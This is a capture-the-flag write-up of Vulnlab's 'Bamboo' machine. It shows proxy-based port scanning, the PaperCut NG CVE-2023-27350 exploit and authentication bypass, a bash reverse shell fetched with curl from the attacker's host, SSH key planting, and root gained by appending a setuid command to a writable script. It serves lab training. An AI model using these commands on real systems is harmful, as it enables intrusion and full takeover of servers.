Bamboo - Vulnlab

Bamboo is a Medium Linux machine from Vulnlab, created by xct. It involves getting foothold by exploiting a CVE in PaperCut NG and escalating privileges by exploiting a 0day.

Enumeration

NMAP

We start, as always, with a standard scan. I’ll use rustscan to get the open ports then nmap to get more details about them.

➜  rustscan --range 1-65535 -b 2000 -a 10.10.66.158
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.66.158:22
Open 10.10.66.158:3128

➜  sudo nmap -sC -sV -p22,3128 --min-rate=5000 10.10.66.158
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-14 10:02 EST
Nmap scan report for 10.10.66.158
Host is up (0.10s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 83:b2:62:7d:9c:9c:1d:1c:43:8c:e3:e3:6a:49:f0:a7 (ECDSA)
|_  256 cf:48:f5:f0:a6:c1:f5:cb:f8:65:18:95:43:b4:e7:e4 (ED25519)
3128/tcp open  http-proxy Squid http proxy 5.2
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/5.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.67 seconds

From the scan, we see SSH and Squid ports are open.

Squid

With the Squid proxy port open, we may be able to use it to look inside. First, let’s add the IP and port to our proxychains4.conf file like this.

➜  cat /etc/proxychains4.conf | tail -n1
http 10.10.66.158 3128

There’s an article about pentesting Squid on HackTricks https://book.hacktricks.xyz/network-services-pentesting/3128-pentesting-squid you can check it.
I’ll use a tool called Squidscan created by xct, available here: https://gist.github.com/xct/597d48456214b15108b2817660fdee00. After downloading the files go.mod and squidscan.go, edit the squidscan.go file to adjust the machine IP and port

...
var (
	proxyURL = "http://10.10.66.158:3128" // adjust proxy ip & port 
	numWorkers = 100  // adjust workers
	numPorts = 65535 // adjust ports
)
...

Then, install the dependencies

➜  go mod tidy
go: downloading github.com/cheggaaa/pb/v3 v3.1.2
go: downloading github.com/VividCortex/ewma v1.2.0
go: downloading github.com/fatih/color v1.14.1
go: downloading github.com/mattn/go-colorable v0.1.13
go: downloading github.com/mattn/go-isatty v0.0.17
go: downloading github.com/mattn/go-runewidth v0.0.12
go: downloading golang.org/x/sys v0.5.0

Build the tool

➜  go build

And we have a squidscan binary that we can run

➜  ls
go.mod  go.sum  squidscan  squidscan.go
➜  ./squidscan
430 / 65535 [->__________________________________________________________________________________________________________________________________________________________________________________] 0.66% 698 p/sPort 22 found!
9108 / 65535 [------------------------>_________________________________________________________________________________________________________________________________________________________] 13.90% 540 p/sPort 9173 found!
Port 9174 found!
9239 / 65535 [------------------------->________________________________________________________________________________________________________________________________________________________] 14.10% 548 p/sPort 9195 found!
Port 9192 found!
10104 / 65535 [--------------------------->_____________________________________________________________________________________________________________________________________________________] 15.42% 528 p/sPort 9191 found!
65533 / 65535 [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------->] 100.00% 1 p/s

It found some ports open inside. We can use nmap with proxychains to scan those specific ports and identify the service for each one.

➜  proxychains -q nmap -sC -sV -p22,9173,9174,9195,9192,9191 127.0.0.1 --min-rate=5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-14 10:24 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.15s latency).

PORT     STATE SERVICE      VERSION
22/tcp   open  ssh          OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 83:b2:62:7d:9c:9c:1d:1c:43:8c:e3:e3:6a:49:f0:a7 (ECDSA)
|_  256 cf:48:f5:f0:a6:c1:f5:cb:f8:65:18:95:43:b4:e7:e4 (ED25519)
9173/tcp open  http         Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
9174/tcp open  ssl/http     Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: organizationName=PaperCut Software International Pty Ltd./stateOrProvinceName=VIC/countryName=AU
| Not valid before: 2023-05-26T13:10:12
|_Not valid after:  2033-05-26T13:10:12
9191/tcp open  sun-as-jpda?
| fingerprint-strings:
|   ...
9192/tcp open  ssl/unknown
| ssl-cert: Subject: commonName=bamboo/organizationName=unknown/stateOrProvinceName=unknown/countryName=unknown
| Not valid before: 2023-05-25T13:09:59
|_Not valid after:  2038-01-18T03:14:07
| fingerprint-strings:
|   ...
9195/tcp open  ssl/unknown
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=bamboo/organizationName=unknown/stateOrProvinceName=unknown/countryName=unknown
| Subject Alternative Name: DNS:bamboo
| Not valid before: 2023-05-25T13:10:17
|_Not valid after:  2030-05-26T13:10:17
| fingerprint-strings:
|   ...
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.92 seconds

We have PaperCut NG running on port 9191. Let’s configure our burp to use the proxy address. Go to proxy settings -> Network -> Connections -> Upstream Proxy Servers and add the Proxy Host and Proxy port in the respective fields.
Now, accessing http://127.0.0.1:9191 should load the page.

User

The PaperCut NG version is 22.0. Let’s look for vulnerabilities for that version. By searching for related CVEs, we find this PoC for CVE-2023-27350 on GitHub: https://github.com/horizon3ai/CVE-2023-27350
We can run it as follows. I used a simple curl to test if the command actually gets executed or no

➜  proxychains -q python3 CVE-2023-27350.py --url 'http://10.10.66.158:9191' --command 'curl http://10.8.0.210'
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

And indeed it gets executed and we got a hit on our python server

➜  http
        inet 10.8.0.210  netmask 255.255.255.0  destination 10.8.0.210
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.66.158 - - [14/Dec/2023 10:43:14] "GET / HTTP/1.1" 200 -

Reverse Shell

I will generate a bash reverse shell using my tool shellcat (you can find it here https://github.com/seriotonctf/shellcat)

➜  shellcat bash 10.8.0.210 443 -w x
[+] Payload: bash -i >& /dev/tcp/10.8.0.210/443 0>&1
[+] Payload written to x

If we try to send the reverse shell like the following we won’t get a shell for some reason

➜  proxychains -q python3 CVE-2023-27350.py --url 'http://10.10.66.158:9191' --command 'bash -i >& /dev/tcp/10.8.0.210/443 0>&1'
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

The method I found working was to transfer the reverse shell file to the machine using curl

➜  proxychains -q python3 CVE-2023-27350.py --url 'http://10.10.66.158:9191' --command 'curl http://10.8.0.210/x -o /tmp/x'
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

Then we can just execute it with bash

➜  proxychains -q python3 CVE-2023-27350.py --url 'http://10.10.66.158:9191' --command 'bash /tmp/x'
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

And we got a shell as the papercut user

➜  nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.0.210] from (UNKNOWN) [10.10.66.158] 57596
bash: cannot set terminal process group (520): Inappropriate ioctl for device
bash: no job control in this shell
papercut@bamboo:~/server$

Let’s stabilize our shell and get the user flag

papercut@bamboo:~/server$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
papercut@bamboo:~/server$ export TERM=xterm
export TERM=xterm
papercut@bamboo:~/server$ ^Z
[1]  + 19327 suspended  nc -nlvp 443
➜  stty raw -echo;fg

[1]  + 19327 continued  nc -nlvp 443

papercut@bamboo:~/server$ whoami
papercut
papercut@bamboo:~/server$ cd ~
papercut@bamboo:~$ cat user.txt
VL{REDACTED}

It is better to get an SSH shell, so let’s add our key to the authorized_keys file

➜  ssh-keygen -f papercut
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in papercut
Your public key has been saved in papercut.pub
The key fingerprint is:
SHA256:o+XOCmyqdH/TqTDp5rrp5jK66ZayoT7gWCR5MQE4JnY serioton@eternal
The key's randomart image is:
+---[RSA 3072]----+
|o...             |
|+ooE             |
|+o.o             |
|o o              |
| +      S        |
|. ..  .+ .       |
|=o..++. o .      |
|=X.++oo= o       |
|&*O*=+oo=        |
+----[SHA256]-----+
➜  cat papercut.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8vSBwo/j04rxieOt6d10b9WEa5DcYY06yxBUlhIOsZDt5wQTrniE9ysK2RwJdQli2J4+knJJRlupwIyxGu9bKEbYmZhBbh3fVTXHrc48bklTeaQVyDW0lB2RWOIShh56KwF3m/Em7cPp8zVYzs/5fL5YKaYOQmwgoweis1/1cNFzvBMLKvrf3FMEqnPf3jgrj8QHBYB98RxFoteB4cGr/hIxOm2c5rQ87Qf0Sfg0dKJdsAVwRvG1tX77w7FmUeQxeCwUM78F5+cAiCBwWZ+r6WLKyzheiI3OaQkOiAxBnfL6e1+WAXyLdoh4tA1yDr8r/kBKgXJ6XJlvrp4Fybz2ZShSaXJD4okzlVBtxCRlD8v2vxKhUS/lSfs25aSea0SXtmH+lG/S5OLFnttx+hg2pltLKuKgHMzwpYggv/3wgvYJS4jwtEAhwdGsrwm6vZOhGwbYRvcx2S7aEJ1D1m0WWn1lqvfaJ3kCQHXkNpOvbvXglpTIGhxaJOE3JCOql6v8= serioton@eternal

papercut@bamboo:~$ mkdir .ssh
papercut@bamboo:~$ cd .ssh
papercut@bamboo:~/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8vSBwo/j04rxieOt6d10b9WEa5DcYY06yxBUlhIOsZDt5wQTrniE9ysK2RwJdQli2J4+knJJRlupwIyxGu9bKEbYmZhBbh3fVTXHrc48bklTeaQVyDW0lB2RWOIShh56KwF3m/Em7cPp8zVYzs/5fL5YKaYOQmwgoweis1/1cNFzvBMLKvrf3FMEqnPf3jgrj8QHBYB98RxFoteB4cGr/hIxOm2c5rQ87Qf0Sfg0dKJdsAVwRvG1tX77w7FmUeQxeCwUM78F5+cAiCBwWZ+r6WLKyzheiI3OaQkOiAxBnfL6e1+WAXyLdoh4tA1yDr8r/kBKgXJ6XJlvrp4Fybz2ZShSaXJD4okzlVBtxCRlD8v2vxKhUS/lSfs25aSea0SXtmH+lG/S5OLFnttx+hg2pltLKuKgHMzwpYggv/3wgvYJS4jwtEAhwdGsrwm6vZOhGwbYRvcx2S7aEJ1D1m0WWn1lqvfaJ3kCQHXkNpOvbvXglpTIGhxaJOE3JCOql6v8= serioton@eternal' > authorized_keys
papercut@bamboo:~/.ssh$

➜  chmod 600 papercut
➜  ssh -i papercut papercut@10.10.66.158
The authenticity of host '10.10.66.158 (10.10.66.158)' can't be established.
ED25519 key fingerprint is SHA256:wekk48npWyS2NE8vmnCU9mj9hhAW0AvPCy+R0C4Iz48.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:61: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.66.158' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.19.0-1025-aws x86_64)

...

papercut@bamboo:~$

---

PrivEsc

We can start enumerating by transferring linpeas.sh to the machine and executing it

papercut@bamboo:/tmp$ wget http://10.8.0.210/linpeas.sh
papercut@bamboo:/tmp$ bash linpeas.sh

There are some interesting files inside the user home directory

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/grub-common.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/pc-app-server.service is calling this writable executable: /home/papercut/server/bin/linux-x64/app-server
/etc/systemd/system/multi-user.target.wants/pc-app-server.service is calling this writable executable: /home/papercut/server/bin/linux-x64/app-server
/etc/systemd/system/multi-user.target.wants/pc-print-deploy.service is calling this writable executable: /home/papercut/providers/print-deploy/linux-x64/pc-print-deploy
/etc/systemd/system/multi-user.target.wants/pc-web-print.service is calling this writable executable: /home/papercut/providers/web-print/linux-x64/pc-web-print
/etc/systemd/system/multi-user.target.wants/systemd-networkd.service could be executing some relative path
/etc/systemd/system/pc-app-server.service is calling this writable executable: /home/papercut/server/bin/linux-x64/app-server
/etc/systemd/system/pc-app-server.service is calling this writable executable: /home/papercut/server/bin/linux-x64/app-server
/etc/systemd/system/pc-print-deploy.service is calling this writable executable: /home/papercut/providers/print-deploy/linux-x64/pc-print-deploy
/etc/systemd/system/pc-web-print.service is calling this writable executable: /home/papercut/providers/web-print/linux-x64/pc-web-print
/etc/systemd/system/sleep.target.wants/grub-common.service could be executing some relative path

Specifically, the linux-x64 folder at /home/papercut/server/bin/linux-x64/

papercut@bamboo:~/server/bin/linux-x64$ ls -lah
total 13M
drwxr-xr-x 3 papercut papercut 4.0K May 26  2023 .
drwx------ 3 papercut papercut 4.0K Sep 29  2022 ..
-rw-r--r-- 1 papercut papercut 1.5K Sep 29  2022 .common
-rwxr-xr-x 1 papercut papercut 109K Sep 29  2022 app-monitor
-rw-r--r-- 1 papercut papercut 5.4K Sep 29  2022 app-monitor.conf
-rwxr-xr-x 1 papercut papercut  17K Sep 29  2022 app-server
-r-s--x--x 1 root     root      11K Sep 29  2022 authpam
-rwxr-xr-x 1 papercut papercut 2.4K Sep 29  2022 authsamba
-rwxr-xr-x 1 papercut papercut  479 Sep 29  2022 create-client-config-file
-rwxr-xr-x 1 papercut papercut  468 Sep 29  2022 create-ssl-keystore
-rwxr-xr-x 1 papercut papercut  763 Sep 29  2022 db-tools
-rwxr-xr-x 1 papercut papercut  501 Sep 29  2022 direct-print-monitor-config-initializer
-rwxr-xr-x 1 papercut papercut 2.3K Sep 29  2022 gather-ldap-settings
drwxr-xr-x 2 papercut papercut 4.0K May 26  2023 lib
-rwxr-xr-x 1 papercut papercut 482K Sep 29  2022 pc-pdl-to-image
-rwxr-xr-x 1 papercut papercut  13M Sep 29  2022 pc-split-scan
-rwxr-xr-x 1 papercut papercut 9.4K Sep 29  2022 pc-udp-redirect
-rwxr-xr-x 1 papercut papercut 7.4K Sep 29  2022 roottasks
-rwxr-xr-x 1 papercut papercut 7.6K Sep 29  2022 sambauserdir
-rwxr-xr-x 1 papercut papercut  493 Sep 29  2022 server-command
-rwxr-xr-x 1 papercut papercut 2.3K Sep 29  2022 setperms
-rwxr-xr-x 1 papercut papercut  286 Sep 29  2022 start-server
-rwxr-xr-x 1 papercut papercut  11K Sep 29  2022 stduserdir
-rwxr-xr-x 1 papercut papercut  279 Sep 29  2022 stop-server
-rwxr-xr-x 1 papercut papercut  480 Sep 29  2022 upgrade-server-configuration

These files are related to the PaperCut NG instance running on port 9191 so let’s forward that port via SSH and enumerate further

➜  ssh -i papercut papercut@10.10.66.158 -L 9191:127.0.0.1:9191 -N

Before beginning any enumeration process, we need to find a way to login. There is an authentication bypass script in exploitdb https://www.exploit-db.com/exploits/51391 which is the same CVE as the one we initially utilized.
We run it as follows and it will output what we need to do.

➜  python3 auth_bypass.py
Enter the ip address: 127.0.0.1
Version: 22.0.6
Vulnerable version
Step 1 visit this url first in your browser: http://127.0.0.1:9191/app?service=page/SetupCompleted
Step 2 visit this url in your browser to bypass the login page : http://127.0.0.1:9191/app?service=page/Dashboard

We just have to visit those two URLs, and magically we are in.
At this point I ran pspy64 and started clicking random things on the website to see what scripts get triggered and by which user.

papercut@bamboo:/tmp$ chmod +x pspy64
papercut@bamboo:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░
                   ░           ░ ░
                               ░ ░

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/12/14 16:54:43 CMD: UID=1001  PID=26434  | ./pspy64
2023/12/14 16:54:43 CMD: UID=1001  PID=26423  | sshd: papercut
2023/12/14 16:54:43 CMD: UID=0     PID=26365  | sshd: papercut [priv]
2023/12/14 16:54:43 CMD: UID=0     PID=26364  |
2023/12/14 16:54:43 CMD: UID=1001  PID=9009   | /usr/bin/gpg-agent --supervised
2023/12/14 16:54:43 CMD: UID=0     PID=8988   |
2023/12/14 16:54:43 CMD: UID=0     PID=8652   |
2023/12/14 16:54:43 CMD: UID=1001  PID=4455   | /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2023/12/14 16:54:43 CMD: UID=0     PID=1458   |
2023/12/14 16:54:43 CMD: UID=1001  PID=1442   | -bash
2023/12/14 16:54:43 CMD: UID=1001  PID=1436   | sshd: papercut@pts/1
2023/12/14 16:54:43 CMD: UID=0     PID=1351   |
2023/12/14 16:54:43 CMD: UID=1001  PID=1350   | (sd-pam)
2023/12/14 16:54:43 CMD: UID=1001  PID=1349   | /lib/systemd/systemd --user
2023/12/14 16:54:43 CMD: UID=0     PID=1346   | sshd: papercut [priv]
2023/12/14 16:54:43 CMD: UID=0     PID=1245   |
...

Eventually I saw the below output on the pspy64 when I entered this page http://127.0.0.1:9191/app?service=page/PrintDeploy, clicked on Start Importing Mobility Print printers in the Import Mobility Print queues screen and pressed Refresh servers

2023/12/14 17:30:23 CMD: UID=0     PID=1      | /sbin/init
2023/12/14 17:32:27 CMD: UID=0     PID=26667  | v2023-02-14-1341/pc-print-deploy-server -dataDir=/home/papercut/providers/print-deploy/linux-x64//data -pclog.dev
2023/12/14 17:32:27 CMD: UID=0     PID=26669  | cat /proc/1/comm
2023/12/14 17:32:27 CMD: UID=0     PID=26670  | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2023/12/14 17:32:27 CMD: UID=0     PID=26671  |
2023/12/14 17:32:27 CMD: UID=0     PID=26677  | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2023/12/14 17:32:27 CMD: UID=0     PID=26676  | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2023/12/14 17:32:27 CMD: UID=0     PID=26675  | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2023/12/14 17:32:27 CMD: UID=0     PID=26678  | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2023/12/14 17:32:29 CMD: UID=0     PID=26697  | /usr/bin/python3 -Es /usr/bin/lsb_release -sd

As you can see, there is a bash script called server-command that got executed as root (UID=0). So maybe we can write a reverse shell payload or any other command inside it.
First, let’s confirm if it’s writable

papercut@bamboo:~/server/bin/linux-x64$ find . -writable
.
./pc-pdl-to-image
./authsamba
./pc-udp-redirect
./start-server
./create-ssl-keystore
./server-command
./app-server
./lib
./lib/libwrapper.so
./lib/wrapper-3.2.3.jar
./gather-ldap-settings
./create-client-config-file
./direct-print-monitor-config-initializer
./db-tools
./upgrade-server-configuration
./app-monitor.conf
./stduserdir
./.common
./pc-split-scan
./setperms
./sambauserdir
./roottasks
./stop-server
./app-monitor

Indeed, we can write inside it. I’ll just add a simple command that will give bash the setuid bit

papercut@bamboo:~/server/bin/linux-x64$ echo 'chmod u+s /bin/bash' >> server-command

As you can see, currently, bash doesn’t have the setuid bit set

papercut@bamboo:~/server/bin/linux-x64$ ls -la /bin/bash
-rwxr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash

But now after we trigger the script by clicking the Refresh Servers button and check bash again we can see it has the setuid bit set

papercut@bamboo:~/server/bin/linux-x64$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash

We are root on the machine :)

papercut@bamboo:~/server/bin/linux-x64$ bash -p
bash-5.1# id
uid=1001(papercut) gid=1001(papercut) euid=0(root) groups=1001(papercut)
bash-5.1# cat /root/root.txt
VL{REDACTED}

Alternatively, we can add our own SSH key to the root authorized_keys file and SSH as him

echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8vSBwo/j04rxieOt6d10b9WEa5DcYY06yxBUlhIOsZDt5wQTrniE9ysK2RwJdQli2J4+knJJRlupwIyxGu9bKEbYmZhBbh3fVTXHrc48bklTeaQVyDW0lB2RWOIShh56KwF3m/Em7cPp8zVYzs/5fL5YKaYOQmwgoweis1/1cNFzvBMLKvrf3FMEqnPf3jgrj8QHBYB98RxFoteB4cGr/hIxOm2c5rQ87Qf0Sfg0dKJdsAVwRvG1tX77w7FmUeQxeCwUM78F5+cAiCBwWZ+r6WLKyzheiI3OaQkOiAxBnfL6e1+WAXyLdoh4tA1yDr8r/kBKgXJ6XJlvrp4Fybz2ZShSaXJD4okzlVBtxCRlD8v2vxKhUS/lSfs25aSea0SXtmH+lG/S5OLFnttx+hg2pltLKuKgHMzwpYggv/3wgvYJS4jwtEAhwdGsrwm6vZOhGwbYRvcx2S7aEJ1D1m0WWn1lqvfaJ3kCQHXkNpOvbvXglpTIGhxaJOE3JCOql6v8= serioton@eternal' >> /root/.ssh/authorized_keys

➜  ssh -i root_key root@10.10.66.158
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.19.0-1025-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Dec 14 18:29:35 UTC 2023

  System load:  0.05126953125     Processes:             116
  Usage of /:   40.0% of 7.57GB   Users logged in:       1
  Memory usage: 58%               IPv4 address for ens5: 10.10.66.158
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

19 updates can be applied immediately.
13 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun May 28 09:16:38 2023 from 10.10.1.254
root@bamboo:~# id
uid=0(root) gid=0(root) groups=0(root)

That concludes the box. I hope you learned something new 🐱🐈